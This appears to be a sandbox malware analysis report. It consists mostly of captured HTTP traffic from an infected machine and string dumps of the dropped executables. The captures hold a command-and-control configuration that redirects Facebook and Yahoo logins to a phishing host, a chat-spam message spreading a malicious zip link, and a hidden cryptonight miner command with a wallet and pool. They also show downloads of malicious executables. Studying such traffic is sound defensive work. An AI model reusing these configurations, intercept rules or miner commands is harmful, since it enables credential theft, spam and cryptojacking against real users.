function labelBytes(bytes){..if (bytes > 1024 * 1024 * 1024){...return (bytes/1024/1024/1024).toFixed(1) " GB";..}..if (bytes > 1024 * 1024){...return (bytes/1024/1024).toFixed(1) " MB";..}..if (bytes > 1024){...return (bytes/1024).toFixed(1) " KB";..}..return bytes " B";.}.function flashReady().{.}.function fileDialogStart().{../* I don't need to do anything here */.}.function fileQueued(file).{..if(document.getElementById('uploadTOS') != undefined && document.getElementById('uploadTOS').checked != true)..{...var progress = new FileProgress(file, this.customSettings.progressTarget);...this.cancelUpload(file.id);...progress.setStatus("Cancelled - Please agree to terms of service!");...return;..}..try..{...// You might include code here that prevents the form from being submitted while the upload is in...// progress. Then you'll want to put code in the Queue Complete handler to "unblock" the form...var progress = new FileProgress(file, this.customSettings.progressTarget);...progress.setStatus("Pending...");...progress.toggleCancel(file, true, this);..}..catch (ex)..{...this.debug(ex);..}.}.function fileQueueError(file, errorCode, message).{..//uploadDialogHide();..try..{...if (errorCode === SWFUpload.QUEUE_ERROR.QUEUE_LIMIT_EXCEEDED)...{....alert("You have attempted to queue too many files.\n" (message === 0 ? "You have reached the upload limit." : "You may select " (message > 1 ? "up to " message " files." : "one file.")));....return;...}...var progress = new FileProgress(file, this.
<<
<<< skipped >>>
GET /_images/icon/ico_footer_twitter.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 1039
Last-Modified: Mon, 10 Sep 2012 22:15:10 GMT
Connection: keep-alive
ETag: "504e666e-40f"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR...0...0......`n.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Kh.A....}..d...bQ. .Z.....j."V j.*....A...7/".x..(..E...">.R..Q...VQ.....&...8c....Mv.z.!.l&..........W..........@......T.%.._...b4).:.. .(.x..O.(@$.....X...k<...3...e.~.Af.A......N.....7.,.2.:.3eS..e......r......w...a.u].TW.bg...T.2.b...O7.U....~B).y..1`..v.......4..~...\?D...[Y.yH...i^x....<".{;..P..S.a4.b..F...P.s.....6..K...W..G...c..n..J.g). U.D......!..........T}.yI.2..0...([. .........v.a..............N/.......5. .9Y........v.Y."........;........O......}z./Z.....dY....M...a.k...d..%.u. (..I.%1Khc....'...;j|.qV..g...!J{5.q....|....e....B..k.iz..Fp>.....& ..I_..;.:...D...C.X.;v...)..t.c...Z. v.J..a..E.O#6h..4x..b.!...9V.....Ok.$.TQ.<..\"....Gs......;.X@9?JTh...<_..N...q( ..B^o?r...H........~....4._....."jj<..,.....n....f.S.u...oa:.......0QA...j.P.o~...^....?..h"Um..t.......V\.d..S.!.k.. ...b.%1..{.|G.y.L.U..q.#..'..$./:8......K....m.R.....tl..}.|...9..D...X..]...2..*?.9..k#....8<.._..#[7...&.....i..J....:..r.\ ....K.....T.1;.9....IEND.B`.....
GET /_images/header_upgrade.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 946
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-3b2"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...TIDATx...[H.a..=.v.0..1...m9"6..]t1.]L.b7.D..b.caE7!...1F........h0LX..2....n...H..sf....(l.....|...~.....>.Ae.b1.Y6...[. .p....^.........)t.?.(..'.....~.....C......E...._....?...v..O....(.x.]h;.-.a6.oa.<..Hz.q......%....! !...Ry.|~..W2.@........"......c...0Np....Q..DVVV...."=C.......TS......?!... *2..da.H...S.g.....l[KKK.....)..<*......*....@%N$.....("9 ..Dfff.........GGG.I...s.3.....iW....H$...e......o.......k....v../...j\((((K.....6%M..|..V.}1<<l@....N...T..d.C`<...h~~./T.'...)...^OO...F..`VWW.....###O...#...........5...000...T.......G...."..E.nll...v..."../......DV.U.V._)....h.......d....]@0UUU...C-...T.........p.D8..CH.R..b..R.........k4..z.....D.....!p.....\...$..g......T*.K,..J...\..=?..4..C..........{."...0N...h.e.544.`..8....._.....|...C.~iOp.Dtc3......g.Q..<..d...n[[..........\WWG....{.L....q.. ..;.....\.;..<....P....9...g.....~.0.k. ...X.....IEND.B`...
GET /dep/dropbox.zip HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:38 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:46 GMT
Accept-Ranges: bytes
Content-Length: 6978685
Content-Type: application/zip
Age: 0
Server: YTS/1.20.28
PK.........}}C..CR............clientutils.js.=kw..... 4|. !.Er...........8....i.a:i....6....5....lUI.......=w9qL..R.T/.J..........s.0G0.y..sc....E..N.d.?`.S....o.:4.6....q/..M6..ysg.&H.E..nv.Z..}..~.l2..j7N8]...?.....F...#.....i.*v.........Y..}......c-.P.......&.E`sf.c....../....xv.Y.............3Z..B..:.9B ...T..%....|\c..s...Z.......K.#.......9......H`.p...?..........X.....d....U.EV....j..AWcn......o...._.,...c#..T....1..]g..N..@ .....0....f....oN../F.#.56v.$...,.......h..Dp.E ......X.ACGs$n..E].M...E@...\.E.A....} .....!. .........q...DS....[#....$'x~.XKTpF..L.Wbj..F\.......J.,@4D....d......Xs.........V..:.v.......Y.5..R....O{.C.5....#...V.#...=.....~{0@P.>.._.u.P....].w...........yg.p.=.SA.......?:.....Yg..f..3..dv.p[....v...Z}vq.......1@.v.'}..}.....1...;x`......d..... .G.......Cv.;;nC..6..z{.......Z...;n..~mS..@.#4.).d.O.X..........x.z.a..k0..0j..3h.X.....4.~.:A.B..........OO.T...A;..q.u....>Y_M...g;.o\.d!.x.w.....9..G..5R8g D5.Ho..a..d...VT.*...ue.$.Iq..>."U.n....{.t[&K*..8Q..O.C.#..;..............T.A.....l.Y........)wQt...N....$v.>.(.<.,.....u.R.r.....U.......-.{.g#. zuk..mk.~.................=:n..z......n..?.......>..5..|r3u>.qg.?.G ..........4^...O...S:4.r.N...m....D...r..=?...^.g....^..W.....W...~..??.......l.......\.p..e...\.p..e.w...A.=......iX{.f...A.=h..m...>...6..f.`.....}.......>.:.X.P~.......:.X.P....@.....M.j@...i@...i@...i@...i@.W....^..j.-...........3Pl......6..U...\c....N..J..D.._.(..JN........ph.U.`.Q!.....o..k%......9.....\ythN.E.@[..?..%*T.g.8_.T."........1.u.
<<
<<< skipped >>>
GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:37 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28
ping.5.FLAG cfg.215."saltsecond.net" "deadtomorrow.net" "ringfirst.net" "westweight.net" "watchstand.net" "signarmy.net" "pointdeal.net" "rockknew.net" "hangclock.net" "wifeknew.net" "spendstudy.net" "southblood.net" "lasopeidres.com" var_user_ip.763.%kill_jhminer% = "1";.%invite_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1";.ëaylive% = "middleevery.net";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "/fb_login/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "middleevery.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R) Atom(TM) CPU D525 @ 1.80GHz (1800 MHz)";.%send_libpurple_spam% = "XMPP.sebastianconstantinbaciu@chat.facebook.com.seby123.Vreau sa postez pozele astea, crezi ca e ok? %dropbox_link%.zip.2.23364.20..";.%newport% = "48744";.plugin.54656.miner_forced.183.win32mrocli2.exe -a cryptonight -a cryptonight -o stratum tcp://minin.gs:17777 -u 1VJruexZzXuRos1tWixCqQ4P7NW8V7qGCYKuRbzXcJz2iixiSzbz837SR4hJBZPoQj1iJtbeKTrek2bXNttF6dgAN6Bjjbx -p x.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4................PE..L......S.....................N......5.............@..............................
<<
<<< skipped >>>
GET /fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 248195
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364176002,173213213*/..if (self.CavalryLogger) { CavalryLogger.start_js(["PIiAz"]); }..__d("EmuController",["AsyncRequest","DataStore","URI","$","copyProperties","emptyFunction","ge","goURI"],function(a,b,c,d,e,f){var g=b('AsyncRequest'),h=b('DataStore'),i=b('URI'),j=b('$'),k=b('copyProperties'),l=b('emptyFunction'),m=b('ge'),n=b('goURI');function o(p,q){this.impression=q;this.containerId=p;h.set(j(p),'emuController',this);return this;}k(o,{fromContainer:function(p){var q=m(p);if(!q)return null;return h.get(q,'emuController');},getEventClass:function(p){return "emuEvent" String(p).trim();}});k(o.prototype,{EVENT_HANDLER_PATH:'/ajax/emu/end.php',CLICK:1,FAN:"fad_fan",FOLLOW:"fad_follow",event:function(p,q,r,s){var t={eid:this.impression,f:0,ui:this.containerId,en:p,a:1};if(q)t.ed=JSON.stringify(q);if(!s)s=l;var u=new g().setURI(this.EVENT_HANDLER_PATH).setData(t).setErrorHandler(s);if(r)u.setHandler(r);u.send();},redirect:function(){var p={eid:this.impression,f:0,ui:this.containerId,en:this.CLICK,a:0,sig:Math.floor(Math.random()*65535) 65536},q=new i(this.EVENT_HANDLER_PATH);q.setQueryData(p);n(q);}});e.exports=o;});.__d("legacy:ad-units-base-js",["EmuController"],function(a,b,c,d){a.EmuController=b('EmuController');},3);.__d("BassWhitespaceListener",["Bootloader","Event","Parent","copyProperties","goURI"],function(a,b,c,d,e,f){var g=b('Bootloader'),h=b('Event'),i=b('Parent'),j=b('copyProperties'),k=b('goURI');function l(m,n){this.link=n;h.listen(m,'click',this.onclicked.bind(this));}j(l.prototype,{onclicked:
<<
<<< skipped >>>
GET /dep/zip.exe HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:56:07 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:38 GMT
Accept-Ranges: bytes
Content-Length: 290816
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM................PE..L.....xH................. ...@.......u.......0....@..........................p..............................................XH..P....`.. ............................................................................0...............................text............ .................. ..`.rdata..."...0...0...0..............@..@.data........`.......`..............@....rsrc... ....`.......`..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /fb_login/index_files/xgsOhvNndM-.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT
Accept-Ranges: bytes
Content-Length: 39059
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364239754,178142531*/..if (self.CavalryLogger) { CavalryLogger.start_js(["FdcP\/"]); }..__d("ad-logging",["Arbiter","AsyncRequest","Banzai","collectDataAttributes","Parent","UFITrackingNodes"],function(a,b,c,d,e,f){var g='ssinfeed',h=b('Arbiter'),i=b('AsyncRequest'),j=b('Banzai'),k=b('collectDataAttributes'),l=b('Parent'),m=b('UFITrackingNodes'),n={};function o(r){return (r.getAttribute&&(r.getAttribute('ajaxify')||r.getAttribute('data-endpoint'))||r.action||r.href||r.name);}function p(r){var s=r.ei||r.ai;if(!s&&r.mei)s=r.mf_story_key||r.mk;if(r!==null&&typeof(s)==="string"){if(r.tn){var t=r.tn.charAt(0),u=m.decodeTrackingInfo(t);if((u==m.types.LIKE_LINK)||(u==m.types.UNLIKE_LINK)||(u==m.types.COMMENT)||(u==m.types.ADD_COMMENT_BOX)||(u==m.types.SHARE_LINK))return;}var v=Date.now(),w=500;r.duplicate_click=!!n[s]&&(v-n[s]<w);n[s]=v;if(j.isEnabled('ssinfeed')){j.post(g,r,{delay:0,retry:j.isEnabled('ssinfeed_retry')});}else new i('/ajax/ssinfeed/end/').setData(r).setAllowCrossPageTransition(true).setMethod('POST').send();}}function q(r,s){if(!s.node)return;var t=o(s.node),u=l.byTag(s.node,'input')||l.byTag(s.node,'button');if(!t&&u&&u.type=="submit"&&u.getAttribute&&u.getAttribute('data-ft'))t="#";var v;if(t&&s.event&&(s.event.type==='click'||s.event.type==='contextmenu')){v=k(s.node,['ft']);v.ft.href=t;v.ft.mouse_type=s.event.type;p(v.ft);}}h.subscribe("ClickRefAction/new",q);});.__d("CalendarUI",["Event","Arbiter","AsyncRequest","CSS","DOM","DOMQuery","DOMScroll","Hovercard","Parent","Run","ScrollAwareDOM",
<<
<<< skipped >>>
GET /fb_login/index_files/VYqjPg0eFkT.css?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 130667
Content-Type: text/css
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364177030,178142509*/..._4-do{text-align:center}.._4-dp{font-size:24px;line-height:28px;margin:40px 0 20px}.._4-dq{font-size:16px;line-height:20px;margin:20px 0}.._4-dr{font-size:12px;line-height:20px}..fbForBusinessWrapper{margin:0 auto;width:980px}..fbForBusinessContent{border-bottom:1px solid #f2f2f2;position:relative}..fbForBusinessNoBorder{border-bottom:none}..fbForBusinessRightCol img{background-color:#ccc;border:5px solid #f9f9f9;float:right;padding:1px}..fbBusinessHomeVideo{background-color:#fff;border:1px solid #ccc}..fbForBusinessContent img,..fbForBusinessFloatedLeft{display:block;float:left}..fbForBusinessPageHeader{margin-top:40px}..fbForBusinessHomePageHeaderText{margin-top:50px}..fbMarketingMenu{list-style:none;margin:0 0 20px 0;padding:0}..fbMarketingMenu a{border-top:1px solid #e5e5e5;display:block;font-size:13px}..fbForBusinessMenuLast a{border-bottom:1px solid #e5e5e5}..fbMarketingMenu a.currentPage,..fbMarketingMenu a:hover{background:#f9f9f9 url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yE/r/JQgQHls27pw.png) no-repeat center right;text-decoration:none}..fbForBusinessHelpfulLinks ul{list-style:none;margin-left:0;padding-left:0}..fbForBusinessHelpfulLinks ul li{font-size:11px;line-height:1.5}..fbForBusinessHelpfulLinks div{color:#666;font-size:11px}..fbForBusinessTip{background:#f9f9f9 url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/qt94E91uvnk.png) no-repeat 15px 10px;border:1px solid #ccc;padding-left:40px}..fbForBusinessList li div{color:#999;font-size:15px;line-height:20px}..fbF
<<
<<< skipped >>>
GET /dep/win64mrocli2.exe HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:38 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 24 May 2014 21:17:40 GMT
Accept-Ranges: bytes
Content-Length: 2954752
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...w..S.................."...-..\............@...............................-.......-...............................................-...... -.d$............*.p"...........p-.PG.......................... `-.(....................(-.X............................text.....".......".................`.p`.data.........".......".............@....rdata........#.......#.............@.`@.pdata..p"....*..$...r*.............@.0@.xdata........ ....... .............@.@@.bss.....[....,.......................`..edata........-.......,.............@.0@.idata..d$... -..&....,.............@.0..CRT....p....P-.......,.............@.@..tls....h....`-.......,.............@.`..reloc..PG...p-..H....,.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ....,.........,.........,.........,.....tg....,.....,...tH........".H........]".....,.H....,.H....,.H....-.....b"..=h.#..tf1.H..(........."......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H...b"...b".1.H..(..zt...,.........1............H..8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=..-..........H9...'..........H...H...|.,.H..u...y.,.1........
<<
<<< skipped >>>
GET /fb_login/index_files/lV3BV1YRc-7.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 71231
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364175964,173217823*/..if (self.CavalryLogger) { CavalryLogger.start_js(["kQ5UI"]); }..__d("PHPQuerySerializer",[],function(a,b,c,d,e,f){function g(n){return h(n,null);}function h(n,o){o=o||'';var p=[];if(n===null||n===undefined){p.push(i(o));}else if(n instanceof Array){for(var q=0;q<n.length; q)if(n[q]!==undefined)p.push(h(n[q],o?(o '[' q ']'):q));}else if(typeof(n)=='object'){for(var r in n)if(n[r]!==undefined)p.push(h(n[r],o?(o '[' r ']'):r));}else p.push(i(o) '=' i(n));return p.join('&');}function i(n){return encodeURIComponent(n).replace(/%5D/g,"]").replace(/[/g,"[");}var j=/^(\w )((?:\[\w*\]) )=?(.*)/;function k(n){if(!n)return {};var o={};n=n.replace(/[/ig,'[').replace(/%5D/ig,']');n=n.split('&');var p=Object.prototype.hasOwnProperty;for(var q=0,r=n.length;q<r;q ){var s=n[q].match(j);if(!s){var t=n[q].split('=');o[l(t[0])]=t[1]===undefined?null:l(t[1]);}else{var u=s[2].split(/\]\[|\[|\]/).slice(0,-1),v=s[1],w=l(s[3]||'');u[0]=v;var x=o;for(var y=0;y<u.length-1;y )if(u[y]){if(!p.call(x,u[y])){var z=u[y 1]&&!u[y 1].match(/^\d $/)?{}:[];x[u[y]]=z;if(x[u[y]]!==z)return o;}x=x[u[y]];}else{if(u[y 1]&&!u[y 1].match(/^\d $/)){x.push({});}else x.push([]);x=x[x.length-1];}if(x instanceof Array&&u[u.length-1]===''){x.push(w);}else x[u[u.length-1]]=w;}}return o;}function l(n){return decodeURIComponent(n.replace(/\ /g,' '));}var m={serialize:g,encodeComponent:i,deserialize:k,decodeComponent:l};e.exports=m;});.__d("URIBase",["copyProperties","PHPQuerySerializer"],function(a,b,c,d,e,f){var g=b('copy
<<
<<< skipped >>>
Map
The Malware connects to the servers at the folowing location(s):
Strings from Dumps
unovkkdak.exe_3644:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
SQSSSh
SQSSSh
YrR.Vf
YrR.Vf
-.pX>
-.pX>
SSSh0
SSSh0
SPSSSh
SPSSSh
SSShp/C
SSShp/C
tFSSSh
tFSSSh
t)SSShP
t)SSShP
SSShP
SSShP
SSShp
SSShp
SSShp&C
SSShp&C
t\SSSh
t\SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
unovkkdak.exe
unovkkdak.exe
zj.exe
zj.exe
eityzygishyx.exe
eityzygishyx.exe
o8.OLnzG
o8.OLnzG
.LlqI
.LlqI
Y:\Bp
Y:\Bp
%s _\(
%s _\(
?_.eg]
?_.eg]
Ì>$
Ì>$
By.Ix
By.Ix
j.mSd
j.mSd
%u 0a
%u 0a
zcÁ
zcÁ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
|%System%\eityzygishyx.exe
|%System%\eityzygishyx.exe
|wellshirt.net
|wellshirt.net
WATCHDOGPROC "c:\windows\system32\unovkkdak.exe"
WATCHDOGPROC "c:\windows\system32\unovkkdak.exe"
%System%\unovkkdak.exe
%System%\unovkkdak.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
eityzygishyx.exe_4936:
.text
.text
`.rdata
`.rdata
@.data
@.data
QSSSSSSh
QSSSSSSh
SQSSSh
SQSSSh
YrR.Vf
YrR.Vf
-.pX>
-.pX>
SSSh0
SSSh0
SPSSSh
SPSSSh
SSShp/C
SSShp/C
tFSSSh
tFSSSh
t)SSShP
t)SSShP
SSShP
SSShP
SSShp
SSShp
SSShp&C
SSShp&C
t\SSSh
t\SSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
WS2_32.dll
WS2_32.dll
OLEAUT32.dll
OLEAUT32.dll
cmd.exe
cmd.exe
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
unovkkdak.exe
unovkkdak.exe
zj.exe
zj.exe
eityzygishyx.exe
eityzygishyx.exe
o8.OLnzG
o8.OLnzG
.LlqI
.LlqI
Y:\Bp
Y:\Bp
%s _\(
%s _\(
?_.eg]
?_.eg]
Ì>$
Ì>$
By.Ix
By.Ix
j.mSd
j.mSd
%u 0a
%u 0a
zcÁ
zcÁ
%Documents and Settings%\LocalService
%Documents and Settings%\LocalService
%System%\eityzygishyx.exe
%System%\eityzygishyx.exe
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
win32mrocli2.exe_428:
.text
.text
p`.data
p`.data
.rdata
.rdata
`@.bss
`@.bss
.idata
.idata
\\\\5\\\\
\\\\5\\\\
|$\3|$81
|$\3|$81
\$\3\$`3
\$\3\$`3
""""%""""1
""""%""""1
1|$,1\$,
1|$,1\$,
|$@3\$,3\$0
|$@3\$,3\$0
\$$!|$$!
\$$!|$$!
|$ 1|$41
|$ 1|$41
\$0#\$(1
\$0#\$(1
\$\3\$ 1|$(
\$\3\$ 1|$(
\$43\$01
\$43\$01
\$ 3\$41
\$ 3\$41
1\$,1|$,
1\$,1|$,
\$ 3\$(3\$8
\$ 3\$(3\$8
|$03|$43|$@
|$03|$43|$@
|$,3|$83|$ 3|$
|$,3|$83|$ 3|$
|$4#|$(3<$
|$4#|$(3<$
%UUUU
%UUUU
L$p%UUUU
L$p%UUUU
|$43|$<1
|$43|$<1
SHA256 block transform for x86, CRYPTOGAMS by <appro></appro>
SHA256 block transform for x86, CRYPTOGAMS by <appro></appro>
libgcj-13.dll
libgcj-13.dll
accepted: %lu/%lu (%.2f%%), %.2f H/s at diff %g %s
accepted: %lu/%lu (%.2f%%), %.2f H/s at diff %g %s
accepted: %lu/%lu (%.2f%%), %s khash/s %s
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
DEBUG: job_id='%s' extranonce2=%s ntime=x
{"method": "getjob", "params": {"id": "%s"}, "id":1}
{"method": "getjob", "params": {"id": "%s"}, "id":1}
JSON decode of %s failed
JSON decode of %s failed
http://
http://
https://
https://
stratum tcp://
stratum tcp://
http://%s
http://%s
cpuminer 2.3.3
cpuminer 2.3.3
Starting Stratum on %s
Starting Stratum on %s
...terminating workio thread
...terminating workio thread
...retry after %d seconds
...retry after %d seconds
JSON decode failed(%d): %s
JSON decode failed(%d): %s
Binding thread %d to cpu %d
Binding thread %d to cpu %d
thread %d: %lu hashes, %.2f H/s
thread %d: %lu hashes, %.2f H/s
thread %d: %lu hashes, %.2f khash/s
thread %d: %lu hashes, %.2f khash/s
Total: %s H/s
Total: %s H/s
Total: %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
work retrieval failed, exiting mining thread %d
JSON key '%s' not found
JSON key '%s' not found
JSON key '%s' is not a string
